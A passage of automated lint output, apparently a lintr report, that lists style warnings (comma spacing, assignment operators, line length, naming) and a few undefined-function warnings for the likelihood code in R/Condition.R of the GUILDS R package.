^\n```\n[R/Condition.R:61:32:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L61) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- pracma::fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                               ^\n```\n[R/Condition.R:61:34:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L61) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- pracma::fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                                 ^\n```\n[R/Condition.R:61:41:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​  maxes <- pracma::fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                                       ~^~\n```\n[R/Condition.R:61:46:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L61) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- pracma::fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                                             ^\n```\n[R/Condition.R:61:49:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​  maxes <- pracma::fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                                               ~^~\n```\n[R/Condition.R:63:7:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L63) *style:* **Use <-, not =, for assignment.**\n```r\n​ ymax = -1 * maxes$fmin;\n      ^\n```\n[R/Condition.R:64:7:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​ xmax = maxes$xmin;\n      ^\n```\n[R/Condition.R:65:7:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L65) *style:* **Use <-, not =, for assignment.**\n```r\n​ xlft = 0;\n      ^\n```\n[R/Condition.R:66:7:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L66) *style:* **Use <-, not =, for assignment.**\n```r\n​ xrgt = 1;\n      ^\n```\n[R/Condition.R:67:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​ eps = .Machine$double.eps; \n     ^\n```\n[R/Condition.R:67:28:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L67) *style:* **Trailing whitespace is superfluous.**\n```r\n​ eps = .Machine$double.eps; \n                           ^\n```\n[R/Condition.R:69:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:69:2:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n ^~~~~~~~~~\n```\n[R/Condition.R:69:14:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n             ^\n```\n[R/Condition.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:69:36:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                   ^\n```\n[R/Condition.R:69:44:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                           ^\n```\n[R/Condition.R:69:52:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                   ^\n```\n[R/Condition.R:69:60:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                           ^\n```\n[R/Condition.R:69:68:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                   ^\n```\n[R/Condition.R:69:71:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L69) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                      ^\n```\n[R/Condition.R:70:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **lines should not be more than 80 characters.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:70:2:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n ^~~~~~~~~~~\n```\n[R/Condition.R:70:14:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n             ^\n```\n[R/Condition.R:70:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:70:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:70:33:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                               ~^~\n```\n[R/Condition.R:70:38:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                     ^\n```\n[R/Condition.R:70:46:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                             ^\n```\n[R/Condition.R:70:54:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                     ^\n```\n[R/Condition.R:70:62:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                             ^\n```\n[R/Condition.R:70:70:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                     ^\n```\n[R/Condition.R:70:73:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L70) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                        ^\n```\n[R/Condition.R:73:4:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkLeftX < 0) {\n   ^\n```\n[R/Condition.R:73:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L73) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkLeftX < 0) {\n    ^~~~~~~~~~\n```\n[R/Condition.R:75:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **lines should not be more than 80 characters.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:34:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                 ^\n```\n[R/Condition.R:75:42:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                         ^\n```\n[R/Condition.R:75:50:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                 ^\n```\n[R/Condition.R:75:58:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                         ^\n```\n[R/Condition.R:75:66:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                                 ^\n```\n[R/Condition.R:75:69:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L75) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                                    ^\n```\n[R/Condition.R:77:25:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g,c(eps,xmax)))$root\n                        ^\n```\n[R/Condition.R:77:31:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g,c(eps,xmax)))$root\n                              ^\n```\n[R/Condition.R:80:4:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkRightX < 0) {\n   ^\n```\n[R/Condition.R:80:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkRightX < 0) {\n    ^~~~~~~~~~~\n```\n[R/Condition.R:82:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **lines should not be more than 80 characters.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n                                 ^\n```\n[R/Condition.R:82:42:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n                                         ^\n```\n[R/Condition.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n                                                 ^\n```\n[R/Condition.R:82:58:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n                                                         ^\n```\n[R/Condition.R:82:66:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n                                                                 ^\n```\n[R/Condition.R:82:69:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L82) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs)\n                                                                    ^\n```\n[R/Condition.R:84:25:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L84) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot(h,c(xmax,1-eps)))$root\n                        ^\n```\n[R/Condition.R:84:32:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L84) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot(h,c(xmax,1-eps)))$root\n                               ^\n```\n[R/Condition.R:84:33:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L84) *style:* **Put spaces around all infix operators.**\n```r\n​     xrgt <- (uniroot(h,c(xmax,1-eps)))$root\n                               ~^~\n```\n[R/Condition.R:87:2:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L87) *style:* **Variable and function names should be all lowercase.**\n```r\n​ calcLLEXP <- function(x) {\n ^~~~~~~~~\n```\n[R/Condition.R:88:15:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:88:15:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:88:33:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n                                ^\n```\n[R/Condition.R:88:41:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n                                        ^\n```\n[R/Condition.R:88:49:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n                                                ^\n```\n[R/Condition.R:88:57:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n                                                        ^\n```\n[R/Condition.R:88:65:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n                                                                ^\n```\n[R/Condition.R:88:68:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n                                                                   ^\n```\n[R/Condition.R:88:71:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L88) *style:* **Put spaces around all infix operators.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax)\n                                                                     ~^~\n```\n[R/Condition.R:92:24:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  aux <- integrate(f = calcLLEXP,\n                       ^~~~~~~~~\n```\n[R/Condition.R:99:14:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L99) *style:* **Trailing whitespace is superfluous.**\n```r\n​  return(LL);  \n             ^~\n```\n[R/Condition.R:103:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:103:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L103) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:103:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L103) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:106:3:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L106) *warning:* **local variable ‘Sx’ assigned but may not be used**\n```r\n​  Sx = length(SADX)\n  ^~\n```\n[R/Condition.R:106:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L106) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:107:3:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L107) *warning:* **local variable ‘Sy’ assigned but may not be used**\n```r\n​  Sy = length(SADY)\n  ^~\n```\n[R/Condition.R:107:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L107) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:108:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L108) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:109:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L109) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:110:3:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L110) *warning:* **local variable ‘J’ assigned but may not be used**\n```r\n​  J = Nx + Ny\n  ^\n```\n[R/Condition.R:110:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L110) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:111:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:114:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L114) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(verbose == TRUE) {\n    ^\n```\n[R/Condition.R:116:55:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L116) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\"); \n                                                      ^\n```\n[R/Condition.R:118:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:118:45:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L118) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:119:50:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L119) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \" Theta Y =\", \"Theta X\", \n                                                 ^\n```\n[R/Condition.R:121:50:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L121) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                ~^\n```\n[R/Condition.R:121:51:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L121) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                  ^\n```\n[R/Condition.R:122:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L122) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:122:45:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L122) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:125:49:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L125) *style:* 